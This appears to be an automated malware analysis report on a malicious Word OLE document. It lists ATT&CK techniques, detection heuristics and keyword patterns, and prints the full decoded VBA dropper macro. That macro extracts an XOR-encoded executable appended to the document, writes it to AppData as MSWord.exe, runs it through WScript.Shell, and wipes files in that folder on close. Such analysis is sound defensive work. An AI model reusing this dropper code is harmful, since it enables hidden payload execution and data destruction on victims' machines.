MALICIOUS
Risk Score: 426
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate/Decode Files or Information
- T1071.001 Web Protocols
The sample is a malicious OLE document containing VBA macros. The macros utilize WScript.Shell and CreateObject, indicating an attempt to execute commands or scripts. The AutoClose subroutine includes logic to delete files, and the presence of 'SC_STR_WSCRIPT' and 'OLE_VBA_WSCRIPT' heuristics strongly suggests the use of Windows Script Host for malicious purposes, likely to download and execute a secondary payload. The 'SE_ENABLE_LURE' heuristic confirms the document attempts to trick the user into enabling macros.
Heuristics (15)
- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Malware.Miskip-10005013-0
- OLE_VBA_MACROS (medium, 6 related findings): VBA macros detected. Document contains VBA macro code.
- OLE_VBA_WSCRIPT (critical): WScript.Shell usage. Matched line in script: `Set oSh = CreateObject("WScript.Shell")`
- OLE_VBA_CREATEOBJ (high): CreateObject call. Matched line in script: `Set FSO = CreateObject("Scripting.FileSystemObject")`
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- OLE_VBA_AUTOOPEN (low): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- OLE_VBA_AUTOCLOSE (low): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- OLE_VBA_ENVIRON (low): Environ() call (env variable access). Matched line in script: `Folder = Environ("appdata") & "\Microsoft\Word"`
- SC_STR_WSCRIPT (high): Reference to Windows Script Host.
- OLE_SLACK_ANOMALY (high): OLE document has large unaccounted-for region. OLE file is 106,553 bytes but its declared streams total only 59,079 bytes; 47,474 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- OLE_APPENDED_PAYLOAD (high): OLE file has appended executable-looking payload bytes. OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
- SC_NOP_EQUIV_SLED (medium): NOP-equivalent sled detected. Long run of 0x40 bytes.
Disassembly: x86 disassembly, validity: code (0.904), 1/1 branch targets land on an instruction boundary (100% coherence).
- OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- SE_ENABLE_LURE (medium): Macro/content-enable lure. Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- EMBEDDED_URL (info): Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3528 bytes |

SHA-256: 0e9a80518512c4310dfebd50acc67e095300aee20f3374bf770976335e00987f
Preview script: first 1,000 lines of the extracted script.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public File As String
Public Folder As String

Function CheckFile(MacrosArray() As Byte, MacrosSize As Long) As Byte
    For I = 0 To MacrosSize - 1
        CheckFile = CheckFile Xor MacrosArray(I)
    Next I
End Function

Function PresentFile(MacrosArray() As Byte, MacrosSize As Long) As Boolean
    Dim VarByte As Byte
    VarByte = 35
    For I = 0 To MacrosSize - 1
        MacrosArray(I) = MacrosArray(I) Xor VarByte
        VarByte = ((VarByte Xor 217) Xor (I Mod 256))
    Next I
    PresentFile = True
End Function

Function ViewDocument() As Boolean
    ActiveDocument.GrammarChecked = False
    ActiveDocument.SpellingChecked = False
    ActiveDocument.Select
    Selection.Font.ColorIndex = wdBlack
    Selection.HomeKey
    ActiveDocument.InlineShapes.Item(1).Width = 110
    ActiveDocument.InlineShapes.Item(1).Height = 90
    ViewDocument = True
End Function

Sub AutoClose()
    On Error Resume Next
    Kill File
    On Error Resume Next
    Set FSO = CreateObject("Scripting.FileSystemObject")
    FSO.DeleteFile Folder & "\*.*", True
    Set FSO = Nothing
End Sub

Sub AutoOpen()
    On Error GoTo FalseReturn
    ActiveWindow.View.ShowAll = True
    ActiveWindow.View.ShowHiddenText = True
    Dim ResultView As Boolean
    ResultView = ViewDocument()
    Dim ThisDocument
    Dim DocSize As Long
    Dim MacrosSize As Long
    Dim MacrosCheck As Byte
    DocSize = FileLen(ActiveDocument.FullName)
    ThisDocument = FreeFile
    Open (ActiveDocument.FullName) For Binary As #ThisDocument
    Get #ThisDocument, (DocSize - 4), MacrosCheck
    Get #ThisDocument, (DocSize - 3), MacrosSize
    If MacrosSize < 8 Then
        GoTo FalseReturn
    End If
    If (MacrosSize + 4) > DocSize Then
        GoTo FalseReturn
    End If
    Dim StartMacros As Long
    StartMacros = DocSize - (MacrosSize + 4)
    Dim MacrosArray() As Byte
    ReDim MacrosArray(MacrosSize - 1)
    Get #ThisDocument, StartMacros, MacrosArray
    Close #ThisDocument
    If Not PresentFile(MacrosArray(), MacrosSize) Then
        GoTo FalseReturn
    End If
    Dim CheckValue As Byte
    CheckValue = CheckFile(MacrosArray(), MacrosSize)
    If MacrosCheck <> CheckValue Then
        GoTo FalseReturn
    End If
    Folder = Environ("appdata") & "\Microsoft\Word"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    If Not FSO.FolderExists(Folder) Then
        Folder = Environ("appdata")
    End If
    Set FSO = Nothing
    Dim Macros
    Macros = FreeFile
    File = Folder & "\" & "MSWord.exe"
    Open (File) For Binary As #Macros
    Put #Macros, 1, MacrosArray
    Close #Macros
    Erase MacrosArray
    Set oSh = CreateObject("WScript.Shell")
    oSh.Run File
    ActiveDocument.Save
    Exit Sub
FalseReturn:
    Close #ThisDocument
    Close #Macros
    ActiveDocument.Save
End Sub
```